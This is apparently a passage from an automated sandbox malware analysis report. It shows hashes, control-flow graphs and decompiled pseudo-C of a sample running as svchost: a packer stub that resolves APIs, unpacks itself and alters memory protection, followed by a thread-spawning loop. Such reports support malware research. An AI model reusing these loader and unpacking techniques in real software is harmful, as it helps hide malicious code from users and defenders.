                                                                                                                                                                                                                                                    • Opcode ID: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                    • Instruction ID: 690ccb563e0dd82574d8c7baf9c5524f022716bcc7e01862e985cdb9dd94f491
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B451FAB5E00209AFDB04CF94C895FAEB7B5FB48704F10C558FA05BB280D779AA41CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 132 401005-40107e LoadLibraryExA GetProcAddress call 401126 137 401083-401099 GetPEB 132->137
                                                                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                                                                    			E00401005() {
                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_pop(_t42);
                                                                                                                                                                                                                                                    				_t43 = _t42 - 5;
                                                                                                                                                                                                                                                    				_t1 = _t43 + 0x85; // 0x401085
                                                                                                                                                                                                                                                    				_t20 =  *_t1();
                                                                                                                                                                                                                                                    				_t2 = _t43 + 0x29ab9; // 0x42aab9
                                                                                                                                                                                                                                                    				_t3 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t43 + 0x29af1)) =  *_t3(_t20, _t2);
                                                                                                                                                                                                                                                    				_t5 = _t43 + 0x29ac8; // 0x42aac8
                                                                                                                                                                                                                                                    				 *(_t43 + 0x29af5) = LoadLibraryExA(_t5, 0, 0);
                                                                                                                                                                                                                                                    				_t8 = _t43 + 0x29ad5; // 0x42aad5
                                                                                                                                                                                                                                                    				_t9 = _t43 + 0x29af5; // 0x74700000
                                                                                                                                                                                                                                                    				_t10 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t43 + 0x29af9)) =  *_t10( *_t9, _t8);
                                                                                                                                                                                                                                                    				_t12 = _t43 + 0x29ae4; // 0x42aae4
                                                                                                                                                                                                                                                    				_t13 = _t43 + 0x29af5; // 0x74700000
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t43 + 0x29afd)) = GetProcAddress( *_t13, _t12);
                                                                                                                                                                                                                                                    				_t16 = _t43 + 0x2b9; // 0x4012b9
                                                                                                                                                                                                                                                    				E00401126(_t16, _t43); // executed
                                                                                                                                                                                                                                                    				asm("lodsd");
                                                                                                                                                                                                                                                    				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x00401005
                                                                                                                                                                                                                                                    0x00401006
                                                                                                                                                                                                                                                    0x0040100c
                                                                                                                                                                                                                                                    0x00401012
                                                                                                                                                                                                                                                    0x00401014
                                                                                                                                                                                                                                                    0x0040101c
                                                                                                                                                                                                                                                    0x00401024
                                                                                                                                                                                                                                                    0x0040102a
                                                                                                                                                                                                                                                    0x0040103b
                                                                                                                                                                                                                                                    0x00401041
                                                                                                                                                                                                                                                    0x00401048
                                                                                                                                                                                                                                                    0x0040104e
                                                                                                                                                                                                                                                    0x00401056
                                                                                                                                                                                                                                                    0x0040105c
                                                                                                                                                                                                                                                    0x00401063
                                                                                                                                                                                                                                                    0x00401070
                                                                                                                                                                                                                                                    0x00401077
                                                                                                                                                                                                                                                    0x0040107e
                                                                                                                                                                                                                                                    0x00401094
                                                                                                                                                                                                                                                    0x00401099

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(kernel32.dll,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74700000,VirtualAlloc), ref: 0040106A
                                                                                                                                                                                                                                                      • Part of subcall function 00401126: VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.858573370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                                                                                    • String ID: GetProcAddress$LoadLibraryExA$VirtualAlloc$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 4074058790-1482053243
                                                                                                                                                                                                                                                    • Opcode ID: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                    • Instruction ID: 4ff399170a710021cd26f301060e842f1d9714487b9385cbdeed3e88436b29f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C701937264038D9FDB72DFA4CC84FDA37A9EF48300F014532E90DCBA50E675AA048B96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 161 408bf20-408bf2d 162 408bf3a-408bf3f 161->162 163 408bf41 162->163 164 408bf30-408bf35 163->164 165 408bf43 163->165 166 408bf36-408bf38 164->166 167 408bf48-408bf4a 165->167 166->162 166->163 168 408bf4c-408bf51 167->168 169 408bf53-408bf57 167->169 168->169 170 408bf59 169->170 171 408bf64-408bf67 169->171 174 408bf5b-408bf62 170->174 175 408bf83-408bf88 170->175 172 408bf69-408bf6e 171->172 173 408bf70-408bf72 171->173 172->173 173->167 174->171 174->175 176 408bf8a-408bf93 175->176 177 408bf9b-408bf9d 175->177 178 408c00a-408c00d 176->178 179 408bf95-408bf99 176->179 180 408bf9f-408bfa4 177->180 181 408bfa6 177->181 182 408c012-408c015 178->182 179->181 180->181 183 408bfa8-408bfab 181->183 184 408bf74-408bf76 181->184 187 408c017-408c019 182->187 188 408bfad-408bfb2 183->188 189 408bfb4 183->189 185 408bf78-408bf7d 184->185 186 408bf7f-408bf81 184->186 185->186 190 408bfd5-408bfe4 186->190 187->182 191 408c01b-408c01e 187->191 188->189 189->184 192 408bfb6-408bfb8 189->192 195 408bff4-408c001 190->195 196 408bfe6-408bfed 190->196 191->182 197 408c020-408c03c 191->197 193 408bfba-408bfbf 192->193 194 408bfc1-408bfc5 192->194 193->194 194->192 198 408bfc7 194->198 195->195 200 408c003-408c005 195->200 196->196 199 408bfef 196->199 197->187 201 408c03e 197->201 203 408bfc9-408bfd0 198->203 204 408bfd2 198->204 199->166 200->166 202 408c044-408c048 201->202 205 408c04a-408c060 LoadLibraryA 202->205 206 408c08f-408c092 202->206 203->192 203->204 204->190 207 408c061-408c066 205->207 208 408c095-408c09c 206->208 207->202 209 408c068-408c06a 207->209 210 408c09e-408c0a0 208->210 211 408c0c0-408c0f0 VirtualProtect * 2 208->211 212 408c06c-408c072 209->212 213 408c073-408c080 GetProcAddress 209->213 214 408c0a2-408c0b1 210->214 215 408c0b3-408c0be 210->215 216 408c0f4-408c0f8 211->216 212->213 217 408c089 ExitProcess 213->217 218 408c082-408c087 213->218 214->208 215->214 216->216 219 408c0fa 216->219 218->207
                                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                                    			_entry_() {
                                                                                                                                                                                                                                                    				char _v128;
                                                                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                    				signed int _v416;
                                                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                    				signed int _v432;
                                                                                                                                                                                                                                                    				void* _v436;
                                                                                                                                                                                                                                                    				void* _v440;
                                                                                                                                                                                                                                                    				void* _v444;
                                                                                                                                                                                                                                                    				void _t72;
                                                                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                                    				void _t75;
                                                                                                                                                                                                                                                    				void _t76;
                                                                                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                                    				unsigned int _t80;
                                                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                                                    				signed char* _t95;
                                                                                                                                                                                                                                                    				long _t96;
                                                                                                                                                                                                                                                    				char* _t99;
                                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                                    				signed int _t106;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t108;
                                                                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                                                    				intOrPtr* _t144;
                                                                                                                                                                                                                                                    				signed int* _t146;
                                                                                                                                                                                                                                                    				signed int _t147;
                                                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                                                                                    				unsigned int* _t171;
                                                                                                                                                                                                                                                    				CHAR* _t173;
                                                                                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                                                                                    				signed int _t175;
                                                                                                                                                                                                                                                    				signed int _t177;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t178;
                                                                                                                                                                                                                                                    				intOrPtr _t179;
                                                                                                                                                                                                                                                    				DWORD* _t180;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t181;
                                                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                                                    				signed int _t186;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				asm("pushad");
                                                                                                                                                                                                                                                    				_t177 = 0x4063000;
                                                                                                                                                                                                                                                    				_t1 = _t177 - 0x62000; // 0x4001000
                                                                                                                                                                                                                                                    				_t170 = _t1;
                                                                                                                                                                                                                                                    				_push(_t170);
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t138 =  *_t177;
                                                                                                                                                                                                                                                    					_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    					asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						if(_t184 < 0) {
                                                                                                                                                                                                                                                    							_t72 =  *_t177;
                                                                                                                                                                                                                                                    							_t177 = _t177 + 1;
                                                                                                                                                                                                                                                    							 *_t170 = _t72;
                                                                                                                                                                                                                                                    							_t170 = _t170 + 1;
                                                                                                                                                                                                                                                    							__eflags = _t170;
                                                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t73 = 1;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                    							if(_t139 == 0) {
                                                                                                                                                                                                                                                    								_t139 =  *_t177;
                                                                                                                                                                                                                                                    								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							asm("adc eax, eax");
                                                                                                                                                                                                                                                    							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                    							_t186 = _t140;
                                                                                                                                                                                                                                                    							if(_t186 >= 0) {
                                                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                                                    							if(_t186 != 0) {
                                                                                                                                                                                                                                                    								L34:
                                                                                                                                                                                                                                                    								_t147 = 0;
                                                                                                                                                                                                                                                    								_t74 = _t73 - 3;
                                                                                                                                                                                                                                                    								__eflags = _t74;
                                                                                                                                                                                                                                                    								if(_t74 < 0) {
                                                                                                                                                                                                                                                    									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                    									__eflags = _t140;
                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                    										_t140 =  *_t177;
                                                                                                                                                                                                                                                    										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									L39:
                                                                                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                                                                    										_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                                                                    											_t138 =  *_t177;
                                                                                                                                                                                                                                                    											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										asm("adc ecx, ecx");
                                                                                                                                                                                                                                                    										L49:
                                                                                                                                                                                                                                                    										__eflags = _t178 - 0xfffffb00;
                                                                                                                                                                                                                                                    										asm("adc ecx, 0x2");
                                                                                                                                                                                                                                                    										_t160 = _t170 + _t178;
                                                                                                                                                                                                                                                    										__eflags = _t178 - 0xfffffffc;
                                                                                                                                                                                                                                                    										if(_t178 <= 0xfffffffc) {
                                                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                                                    												_t75 =  *_t160;
                                                                                                                                                                                                                                                    												_t160 = _t160 + 4;
                                                                                                                                                                                                                                                    												 *_t170 = _t75;
                                                                                                                                                                                                                                                    												_t170 = _t170 + 4;
                                                                                                                                                                                                                                                    												_t147 = _t147 - 4;
                                                                                                                                                                                                                                                    												__eflags = _t147;
                                                                                                                                                                                                                                                    											} while (_t147 > 0);
                                                                                                                                                                                                                                                    											_t170 = _t170 + _t147;
                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											goto L50;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                    											L50:
                                                                                                                                                                                                                                                    											_t76 =  *_t160;
                                                                                                                                                                                                                                                    											_t160 = _t160 + 1;
                                                                                                                                                                                                                                                    											 *_t170 = _t76;
                                                                                                                                                                                                                                                    											_t170 = _t170 + 1;
                                                                                                                                                                                                                                                    											_t147 = _t147 - 1;
                                                                                                                                                                                                                                                    											__eflags = _t147;
                                                                                                                                                                                                                                                    										} while (_t147 != 0);
                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t147 = _t147 + 1;
                                                                                                                                                                                                                                                    									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                    									__eflags = _t140;
                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                    										_t140 =  *_t177;
                                                                                                                                                                                                                                                    										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                                                    												L43:
                                                                                                                                                                                                                                                    												_t141 = _t140 + _t140;
                                                                                                                                                                                                                                                    												__eflags = _t141;
                                                                                                                                                                                                                                                    												if(_t141 == 0) {
                                                                                                                                                                                                                                                    													_t141 =  *_t177;
                                                                                                                                                                                                                                                    													_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    													asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												asm("adc ecx, ecx");
                                                                                                                                                                                                                                                    												_t140 = _t141 + _t141;
                                                                                                                                                                                                                                                    												__eflags = _t140;
                                                                                                                                                                                                                                                    											} while (__eflags >= 0);
                                                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                                                    												break;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t140 =  *_t177;
                                                                                                                                                                                                                                                    											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    											__eflags = _t177;
                                                                                                                                                                                                                                                    											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    										} while (_t177 >= 0);
                                                                                                                                                                                                                                                    										_t147 = _t147 + 2;
                                                                                                                                                                                                                                                    										__eflags = _t147;
                                                                                                                                                                                                                                                    										goto L49;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t78 =  *_t177;
                                                                                                                                                                                                                                                    								_t177 = _t177 + 1;
                                                                                                                                                                                                                                                    								_t79 = _t78 ^ 0xffffffff;
                                                                                                                                                                                                                                                    								__eflags = _t79;
                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                    									_pop(_t177);
                                                                                                                                                                                                                                                    									_t171 = _t177;
                                                                                                                                                                                                                                                    									goto L55;
                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                    											L55:
                                                                                                                                                                                                                                                    											_t80 =  *_t171;
                                                                                                                                                                                                                                                    											_t171 =  &(_t171[0]);
                                                                                                                                                                                                                                                    											__eflags = _t80 - 0xe8 - 1;
                                                                                                                                                                                                                                                    										} while (_t80 - 0xe8 > 1);
                                                                                                                                                                                                                                                    										__eflags =  *_t171;
                                                                                                                                                                                                                                                    									} while ( *_t171 != 0);
                                                                                                                                                                                                                                                    									asm("rol eax, 0x10");
                                                                                                                                                                                                                                                    									 *_t171 = ( *_t171 >> 8) - _t171 + _t177;
                                                                                                                                                                                                                                                    									__eflags =  &(_t171[1]);
                                                                                                                                                                                                                                                    									asm("loop 0xffffffdb");
                                                                                                                                                                                                                                                    									_t55 = _t177 + 0x89000; // 0x408a000
                                                                                                                                                                                                                                                    									_t173 = _t55;
                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                    										L58:
                                                                                                                                                                                                                                                    										_t90 =  *_t173;
                                                                                                                                                                                                                                                    										__eflags = _t90;
                                                                                                                                                                                                                                                    										if(_t90 == 0) {
                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_t56 =  &(_t173[4]); // 0x2000
                                                                                                                                                                                                                                                    										_t146 =  *_t56 + _t177;
                                                                                                                                                                                                                                                    										_t175 =  &(_t173[8]);
                                                                                                                                                                                                                                                    										__eflags = _t175;
                                                                                                                                                                                                                                                    										_t178 = LoadLibraryA(_t90 + _t177 + 0x8c000);
                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                    											_t173 = _t175 + 1;
                                                                                                                                                                                                                                                    											__eflags =  *_t175;
                                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                                                                                                                    												_push( *_t173 & 0x0000ffff);
                                                                                                                                                                                                                                                    												_t173 =  &(_t173[2]);
                                                                                                                                                                                                                                                    												__eflags = _t173;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											asm("repne scasb");
                                                                                                                                                                                                                                                    											_t136 = GetProcAddress(_t178, _t173);
                                                                                                                                                                                                                                                    											__eflags = _t136;
                                                                                                                                                                                                                                                    											if(_t136 == 0) {
                                                                                                                                                                                                                                                    												ExitProcess();
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											 *_t146 = _t136;
                                                                                                                                                                                                                                                    											_t146 =  &(_t146[1]);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t174 =  &(_t173[4]);
                                                                                                                                                                                                                                                    									__eflags = _t174;
                                                                                                                                                                                                                                                    									_t63 = _t177 - 4; // 0x4000ffc
                                                                                                                                                                                                                                                    									_t144 = _t63;
                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                    										_t174 = _t174 + 1;
                                                                                                                                                                                                                                                    										_t93 = 0;
                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                    										if(0 == 0) {
                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										__eflags = 0 - 0xef;
                                                                                                                                                                                                                                                    										if(0 > 0xef) {
                                                                                                                                                                                                                                                    											_t93 =  *_t174;
                                                                                                                                                                                                                                                    											_t174 = _t174 + 2;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_t144 = _t144 + _t93;
                                                                                                                                                                                                                                                    										asm("rol eax, 0x10");
                                                                                                                                                                                                                                                    										 *_t144 =  *_t144 + _t177;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_t66 = _t177 + 0x8c05c; // 0x74716760
                                                                                                                                                                                                                                                    									_t179 =  *_t66;
                                                                                                                                                                                                                                                    									_t67 = _t177 - 0x1000; // 0x4000000
                                                                                                                                                                                                                                                    									_t170 = _t67;
                                                                                                                                                                                                                                                    									_t138 = 0x1000;
                                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                                    									VirtualProtect(_t170, 0x1000, 4, _t180);
                                                                                                                                                                                                                                                    									_t68 = _t170 + 0x1df; // 0x40001df
                                                                                                                                                                                                                                                    									_t95 = _t68;
                                                                                                                                                                                                                                                    									 *_t95 =  *_t95 & 0x0000007f;
                                                                                                                                                                                                                                                    									_t69 =  &(_t95[0x28]);
                                                                                                                                                                                                                                                    									 *_t69 = _t95[0x28] & 0x0000007f;
                                                                                                                                                                                                                                                    									__eflags =  *_t69;
                                                                                                                                                                                                                                                    									_pop(_t96);
                                                                                                                                                                                                                                                    									_push(_t96);
                                                                                                                                                                                                                                                    									VirtualProtect(_t170, 0x1000, _t96, _t180); // executed
                                                                                                                                                                                                                                                    									asm("popad");
                                                                                                                                                                                                                                                    									_t99 =  &_v128;
                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                    										_push(0);
                                                                                                                                                                                                                                                    										__eflags = _t180 - _t99;
                                                                                                                                                                                                                                                    									} while (_t180 != _t99);
                                                                                                                                                                                                                                                    									_t181 = _t180 - 0xffffff80;
                                                                                                                                                                                                                                                    									_push(_t179);
                                                                                                                                                                                                                                                    									_t178 = _t181;
                                                                                                                                                                                                                                                    									_t180 = _t181 - 0x1b8;
                                                                                                                                                                                                                                                    									_t100 =  &_v280;
                                                                                                                                                                                                                                                    									_push(_t100);
                                                                                                                                                                                                                                                    									_push(0x202); // executed
                                                                                                                                                                                                                                                    									L0400100C(); // executed
                                                                                                                                                                                                                                                    									__eflags = _t100;
                                                                                                                                                                                                                                                    									if(_t100 != 0) {
                                                                                                                                                                                                                                                    										L17:
                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v408 = 0;
                                                                                                                                                                                                                                                    									_v412 = 0;
                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                    										_t101 = E04001490(); // executed
                                                                                                                                                                                                                                                    										_v416 = _t101;
                                                                                                                                                                                                                                                    										__eflags = _v416;
                                                                                                                                                                                                                                                    										if(_v416 <= 0) {
                                                                                                                                                                                                                                                    											goto L14;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										__eflags = _v416 - 0x2710;
                                                                                                                                                                                                                                                    										if(_v416 >= 0x2710) {
                                                                                                                                                                                                                                                    											goto L14;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                    										_t103 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                    										_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                    										_v420 = _t103;
                                                                                                                                                                                                                                                    										__eflags = _v420;
                                                                                                                                                                                                                                                    										if(_v420 != 0) {
                                                                                                                                                                                                                                                    											E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                    											_t117 = E04001470(0xc);
                                                                                                                                                                                                                                                    											_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                    											_v440 = _t117;
                                                                                                                                                                                                                                                    											_v424 = _v440;
                                                                                                                                                                                                                                                    											 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                    											 *(_v424 + 4) = _v420;
                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                    											CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_v428 = 0;
                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                    											__eflags = _v428 - 3;
                                                                                                                                                                                                                                                    											if(_v428 >= 3) {
                                                                                                                                                                                                                                                    												break;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t106 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                    											_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                    											_v432 = _t106;
                                                                                                                                                                                                                                                    											__eflags = _v432;
                                                                                                                                                                                                                                                    											if(_v432 != 0) {
                                                                                                                                                                                                                                                    												E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                    												_t111 = E04001470(0xc);
                                                                                                                                                                                                                                                    												_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                    												_v444 = _t111;
                                                                                                                                                                                                                                                    												_v436 = _v444;
                                                                                                                                                                                                                                                    												_t164 = _v412 + _v428;
                                                                                                                                                                                                                                                    												__eflags = _t164;
                                                                                                                                                                                                                                                    												 *_v436 =  *(0x4088c20 + _t164 * 4);
                                                                                                                                                                                                                                                    												 *(_v436 + 4) = _v432;
                                                                                                                                                                                                                                                    												 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                    												CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t108 =  &(_v428->nLength);
                                                                                                                                                                                                                                                    											__eflags = _t108;
                                                                                                                                                                                                                                                    											_v428 = _t108;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                    										Sleep(0x9c40);
                                                                                                                                                                                                                                                    										L04001006();
                                                                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                                                                    										L14:
                                                                                                                                                                                                                                                    										Sleep(0x7530);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t178 = _t79 >> 1;
                                                                                                                                                                                                                                                    								goto L39;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t140 =  *_t177;
                                                                                                                                                                                                                                                    							_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    							asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    							if(_t177 < 0) {
                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							L28:
                                                                                                                                                                                                                                                    							_t73 = _t73 - 1;
                                                                                                                                                                                                                                                    							_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                    							if(_t138 == 0) {
                                                                                                                                                                                                                                                    								_t138 =  *_t177;
                                                                                                                                                                                                                                                    								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							asm("adc eax, eax");
                                                                                                                                                                                                                                                    							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                    							if(_t139 == 0) {
                                                                                                                                                                                                                                                    								_t139 =  *_t177;
                                                                                                                                                                                                                                                    								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                    								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							asm("adc eax, eax");
                                                                                                                                                                                                                                                    							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                    							_t186 = _t140;
                                                                                                                                                                                                                                                    							if(_t186 >= 0) {
                                                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                                    						_t138 = _t138 + _t138;
